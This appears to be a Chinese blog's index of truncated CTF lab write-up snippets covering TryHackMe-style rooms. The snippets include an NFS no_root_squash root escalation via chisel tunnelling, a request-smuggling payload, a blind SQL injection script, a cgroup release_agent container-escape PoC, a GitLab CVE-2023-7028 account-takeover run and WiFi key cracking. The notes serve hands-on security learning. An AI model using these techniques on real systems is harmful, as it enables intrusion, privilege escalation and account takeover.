overpass3
gpg --import '/home/kali/Desktop/priv.key' gpg --output decrypted-file --decrypt '*.gpg' 破解出来的是个啥 啊 是个xlsx 回复后缀并查看,可以发现一些东西 ftp上去发现是那个库,这时候本来上传一个马就行了,但是不知道为什么传不上去 传到…/就行了web目录 玛德,又是linpeas 一堆看不懂的, nsf服务是个啥 2049端口的服务,先挂个代理 ./chisel server --reverse --port 9002 ./chisel client 10.10.37.90:9002 R:2049:127.0.0.1:2049 然后 sudo mount -t nfs -o port=2049 localhost:/ /tmp/share 就能把远程的服务挂在本地/tmp/share下了,由于是no_root_squash 我们在对/share内文件执行命令的时候,共享到了远程的服务,也就是 cp /bin/bash fuck_bash chown root.root fuck_bas ...
overpass 2
久违了,wireshark … suid加上./.suid_bash -p 执行他发现和bash效果一样 所以照猫画虎,提权成功
HTTP Request Smuggling
前后端处理差异 CL.TEContent-Length/Transfer-Encoding TE.CL正好反过来 TE.TE 利用编码不同 POST / HTTP/1.1Host: example.comContent-length: 4Transfer-Encoding: chunkedTransfer-Encoding: chunked14cPOST /update HTTP/1.1Host: example.comContent-length: 15isadmin=true0 这样爆破 为什么能返回 不理解啊!!! 别人的请求错误的和我的请求合并了???
Reset
看情况是个重启提权 Starting Nmap 7.60 ( https://nmap.org ) at 2024-02-06 13:05 GMTNmap scan report for ip-10-10-57-36.eu-west-1.compute.internal (10.10.57.36)Host is up (0.00050s latency).Not shown: 988 filtered portsPORT STATE SERVICE VERSION53/tcp open domain Microsoft DNS88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-02-06 13:06:31Z)135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn389/tcp open ...
Path Traversal
教学关…最后一个是个目录,服了
Umbrella
Starting Nmap 7.60 ( https://nmap.org ) at 2024-02-08 13:08 GMTNmap scan report for ip-10-10-190-94.eu-west-1.compute.internal (10.10.190.94)Host is up (0.0010s latency).Not shown: 996 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)3306/tcp open mysql MySQL 5.7.40| mysql-info: | Protocol: 10| Version: 5.7.40| Thread ID: 3| Capabilities flags: 65535| Some Capabilities: LongColumnFlag, Speaks41ProtocolOld, F ...
补Kitty
完整脚本 import requestsurl = 'http://10.10.196.247/index.php'dicts = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_{}'flag = ''for i in range(1, 100): found = False for charactor in dicts: # payload = f"' UNION SELECT 1,2,3,4 WHERE database() LIKE '{flag}{charactor}%'--+" # payload = f"' UNION SELECT 1,2,3,4 FROM information_schema.tables WHERE table_schema = 'my ...
Container Vulnerabilities v2.7
特权模式 特权模式下docker可以与操作系统交互 capsh --print打印docker容器具有的功能 比如 capsh --print Current: = cap_chown, cap_sys_module, cap_sys_chroot, cap_sys_admin, cap_setgid,cap_setuid poc like mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/xecho 1 > /tmp/cgrp/x/notify_on_releasehost_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`echo "$host_path/exploit" > /tmp/cgrp/release_agentecho '#!/bin/sh' > /exploitecho "cat /ho ...
SSRF
依旧教学关 Starting Nmap 7.60 ( https://nmap.org ) at 2024-02-09 07:59 GMTNmap scan report for ip-10-10-40-59.eu-west-1.compute.internal (10.10.40.59)Host is up (0.00043s latency).Not shown: 996 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.41 ((Ubuntu))| http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set|_http-server-header: Ap ...
git_cve_23_7028v1.5
教学关 ┌──(root㉿kali)-[~/poc/CVE/2023-7028]└─# p4 python poc.py -u http://10.10.24.8:8000 -t victim@mail.gitlab.thm -e attacker@mail.gitlab.thm[proxychains] config file found: /etc/proxychains4.conf[proxychains] preloading /usr/lib/aarch64-linux-gnu/libproxychains.so.4[proxychains] DLL init: proxychains-ng 4.16[DEBUG] Getting authenticity_token ...[proxychains] Strict chain ... 120.46.78.45:7777 ... 10.10.24.8:8000 ... OK[DEBUG] authenticity_token = Pz24wEXlGsshAPFmSG8dISVYFJW2SXNGi-OMzksGkeJ ...
Dodge
Starting Nmap 7.60 ( https://nmap.org ) at 2024-02-10 07:25 GMTNmap scan report for ip-10-10-198-97.eu-west-1.compute.internal (10.10.198.97)Host is up (0.00038s latency).Not shown: 997 filtered portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.41|_http-server-header: Apache/2.4.41 (Ubuntu)|_http-title: 403 Forbidden443/tcp open ssl/http Apache httpd 2.4.41|_http-server-header: Apache/2.4 ...
The Return of the Yeti
破解WIFI密码 tcpdump -r VanSpy.pcapng -w VanSpy_converted.pcap ╰─ aircrack-ng VanSpy.pcapng -w ~/CTF/tools/rockyou.txtReading packets, please wait...Opening VanSpy.pcapngUnsupported file format (not a pcap or IVs file).Read 0 packets.No networks found, exiting.Quitting aircrack-ng... 先转换成pcap 上面的命令不行,用wireshark Aircrack-ng 1.7[00:00:02] 34656/10303727 keys tested (19250.10 k/s)Time left: 8 minutes, 53 seconds 0.34% KEY FOUND! [ Chris ...
avatar
dionysus
我醉欲眠卿且去
此心安处
公告